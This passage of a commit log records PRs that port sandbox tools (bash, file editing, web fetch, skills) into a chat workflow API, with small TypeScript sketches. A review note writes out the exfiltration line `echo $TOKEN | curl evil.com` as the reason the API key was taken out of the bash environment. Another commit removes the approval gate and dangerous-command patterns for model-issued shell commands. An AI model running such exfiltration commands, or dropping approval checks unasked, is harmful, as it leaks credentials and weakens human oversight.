- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB
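
Two of the behaviors listed above, sketched as pure functions under stated assumptions. The `N: line` output format, the default `limit`, and the error messages are illustrative choices, not taken from the ported tools.

```typescript
// Returns `limit` lines starting at the 1-indexed `offset`, each prefixed
// with its line number.
function readNumbered(content: string, offset = 1, limit = 2000): string {
  const lines = content.split("\n");
  const start = Math.max(offset, 1) - 1;
  return lines
    .slice(start, start + limit)
    .map((line, i) => `${start + i + 1}: ${line}`)
    .join("\n");
}

type EditResult =
  | { ok: true; content: string }
  | { ok: false; error: string };

// Replaces `oldString` only when it occurs exactly once; zero or multiple
// matches are rejected so the edit is never ambiguous.
function editExact(content: string, oldString: string, newString: string): EditResult {
  if (oldString.length === 0) return { ok: false, error: "oldString is empty" };
  const count = content.split(oldString).length - 1;
  if (count === 0) return { ok: false, error: "oldString not found" };
  if (count > 1) return { ok: false, error: `oldString matches ${count} times` };
  // A function replacer avoids `$&`-style pattern expansion in newString.
  return { ok: true, content: content.replace(oldString, () => newString) };
}
```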

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path
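
A minimal sketch of the two helpers, assuming POSIX paths and a POSIX shell. The signatures are guesses from the one-line descriptions above rather than the ported code.

```typescript
// Wraps a value in single quotes for a POSIX shell. An embedded `'` becomes
// `'\''`: close the quote, emit an escaped quote, reopen the quote.
function shellEscape(value: string): string {
  return `'${value.replace(/'/g, `'\\''`)}'`;
}

// Shows a path relative to the working directory when it lives inside it,
// and leaves it absolute otherwise.
function toDisplayPath(absolutePath: string, workingDirectory: string): string {
  const root = workingDirectory.replace(/\/+$/, "");
  if (absolutePath === root) return ".";
  return absolutePath.startsWith(`${root}/`)
    ? absolutePath.slice(root.length + 1)
    : absolutePath;
}
```

The trailing `/` in the prefix check keeps a sibling such as `/workspace` from being treated as inside `/work`.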

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.
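
For chat-side integrators, a hedged sketch of how a request against the stub might be assembled. The base URL, the `Authorization: Bearer` header form, and both function and constant names are assumptions; only the path, the body fields, and the status meanings come from the list above.

```typescript
interface ChatWorkflowBody {
  messages: unknown[]; // UIMessage-shaped objects; shape not modeled here
  chatId: string;
  sessionId: string;
}

// Outcomes listed for the stub, keyed by HTTP status.
const STUB_STATUS_MEANINGS: Record<number, string> = {
  200: "UIMessage stream with x-workflow-run-id header",
  400: "invalid JSON, invalid body, or sandbox not initialized",
  401: "authentication failed",
  403: "session not owned by the API key's account",
  404: "session or chat not found",
  500: "session lookup failed",
};

// Builds the URL and fetch-style init object without sending anything.
function buildChatWorkflowRequest(baseUrl: string, apiKey: string, body: ChatWorkflowBody) {
  return {
    url: `${baseUrl.replace(/\/+$/, "")}/api/chat/workflow`,
    init: {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
        Authorization: `Bearer ${apiKey}`, // assumed header form
      },
      body: JSON.stringify(body),
    },
  };
}
```

The returned `url` and `init` can be passed to `fetch`; on a 200 the run id is read from the `x-workflow-run-id` response header.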

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop
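
As an illustration of the `org-<slug>-<uuid>` → uuid mapping, a small sketch. The regular expression and the `null` return for non-matching input are assumptions, and the URL in the usage note is made up.

```typescript
// Matches `org-<slug>-<uuid>` anywhere in the input and captures the UUID.
const ORG_UUID_PATTERN =
  /org-[a-z0-9-]*?-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})/i;

// Returns the lowercased org UUID, or null when the input has no org segment.
function extractOrgId(cloneUrl: string): string | null {
  const match = ORG_UUID_PATTERN.exec(cloneUrl);
  return match?.[1]?.toLowerCase() ?? null;
}
```

For example, `extractOrgId("https://example.com/acme/org-my-label-1B2C3D4E-0000-4000-8000-ABCDEFABCDEF.git")` yields the UUID in lowercase.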

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 compareAndSetChatActiveStreamId + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.
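
The CAS-before-start ordering can be sketched with an in-memory map standing in for `chats.active_stream_id`. Everything here is illustrative: `startWorkflow` is a hypothetical synchronous stand-in for the real async start call, and releasing the claim on failure is an assumption about desirable behavior, not something the commit states.

```typescript
// In-memory stand-in for chats.active_stream_id (chatId -> value).
const activeStreamIds = new Map<string, string | null>();

// Sets the value to `next` only if the current value equals `expected`.
function compareAndSet(chatId: string, expected: string | null, next: string | null): boolean {
  if ((activeStreamIds.get(chatId) ?? null) !== expected) return false;
  activeStreamIds.set(chatId, next);
  return true;
}

type StartResult = { status: 200; runId: string } | { status: 409 };

// Claims the chat with a placeholder BEFORE starting work, then promotes the
// placeholder to the real run id. A request that loses the claim never starts.
function startChatRun(
  chatId: string,
  placeholder: string, // e.g. `pending-<uuid>`
  startWorkflow: () => string, // hypothetical: returns the run id
): StartResult {
  if (!compareAndSet(chatId, null, placeholder)) return { status: 409 };
  let runId: string;
  try {
    runId = startWorkflow();
  } catch (error) {
    compareAndSet(chatId, placeholder, null); // assumption: release the claim
    throw error;
  }
  compareAndSet(chatId, placeholder, runId);
  return { status: 200, runId };
}
```

Because the losing request returns 409 before `startWorkflow` is called, only one request can reach the model.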

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.
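
The title-truncation fix can be shown in a few lines. The value 80 for `TITLE_MAX_LENGTH` is assumed from the "title-from-first-80" note earlier in this commit; `truncateTitle` is a hypothetical name.

```typescript
const TITLE_MAX_LENGTH = 80; // assumed value
const ELLIPSIS = "…"; // one character, unlike "..."

// Keeps the result at or under `max` characters by budgeting for the suffix.
function truncateTitle(text: string, max: number = TITLE_MAX_LENGTH): string {
  if (text.length <= max) return text;
  const bodyBudget = max - ELLIPSIS.length;
  return text.slice(0, bodyBudget) + ELLIPSIS;
}
```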

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting
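
A rough sketch of what a hand-rolled frontmatter parser for this YAML subset could look like. It is an assumption-level reconstruction from the bullet above (key:value pairs, quoted strings, booleans, colons preserved in values), not the ported parser.

```typescript
type FrontmatterValue = string | boolean;

// Parses the leading `---` block of a SKILL.md-style document.
function parseSkillFrontmatter(markdown: string): Record<string, FrontmatterValue> {
  const result: Record<string, FrontmatterValue> = {};
  const match = /^---\r?\n([\s\S]*?)\r?\n---/.exec(markdown);
  if (!match) return result;
  const block = match[1] ?? "";
  for (const line of block.split(/\r?\n/)) {
    // Split on the FIRST colon only, so values such as URLs keep their colons.
    const separator = line.indexOf(":");
    if (separator <= 0 || line.trimStart().startsWith("#")) continue;
    const key = line.slice(0, separator).trim();
    const raw = line.slice(separator + 1).trim();
    const quoted = /^(["'])(.*)\1$/.exec(raw);
    if (quoted) {
      result[key] = quoted[2] ?? "";
    } else if (raw === "true" || raw === "false") {
      result[key] = raw === "true";
    } else {
      result[key] = raw;
    }
  }
  return result;
}
```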

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.
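
The content pipeline named above (extractSkillBody → injectSkillDirectory → substituteArguments) might compose as follows. The blank line after the header and the `renderSkill` wrapper are assumptions for the sketch.

```typescript
// Strips a leading `---` frontmatter block and returns the remaining body.
function extractSkillBody(markdown: string): string {
  return markdown.replace(/^---\r?\n[\s\S]*?\r?\n---\r?\n?/, "");
}

// Prepends the `Skill directory: <path>` header.
function injectSkillDirectory(body: string, skillDirectory: string): string {
  return `Skill directory: ${skillDirectory}\n\n${body}`;
}

// Replaces every literal `$ARGUMENTS` token with the caller's arguments.
function substituteArguments(body: string, args: string): string {
  return body.split("$ARGUMENTS").join(args);
}

// Hypothetical wrapper applying the three steps in the order listed.
function renderSkill(markdown: string, skillDirectory: string, args: string): string {
  return substituteArguments(
    injectSkillDirectory(extractSkillBody(markdown), skillDirectory),
    args,
  );
}
```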

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)
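
The conditional registration can be sketched by tracking tool names only. The leaf names below are taken from the PR titles in this log and may not match the real registry keys; `listAgentToolNames` is a hypothetical stand-in for `buildAgentTools`.

```typescript
interface SkillMetadata {
  name: string;
  description: string;
}

// Assumed registry keys for the eight leaf tools.
const LEAF_TOOL_NAMES = [
  "bash", "read", "write", "edit", "grep", "glob", "todo", "web_fetch",
] as const;

// Adds "skill" only when the discovered catalog is non-empty, so models in
// sandboxes without skills never see the tool.
function listAgentToolNames(options: { skills?: SkillMetadata[] } = {}): string[] {
  const names: string[] = [...LEAF_TOOL_NAMES];
  if ((options.skills?.length ?? 0) > 0) names.push("skill");
  return names;
}
```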

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at `${workingDirectory}/skills/`,
a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - ${workingDirectory}/.claude/skills/   (project, claude-style)
  - ${workingDirectory}/.agents/skills/   (project, agents-style)
  - ${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: `${HOME}/.agents/skills`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against `recoupable/org-rostrum-pacific-...`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked `skill({ skill: "recoup-api" })` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

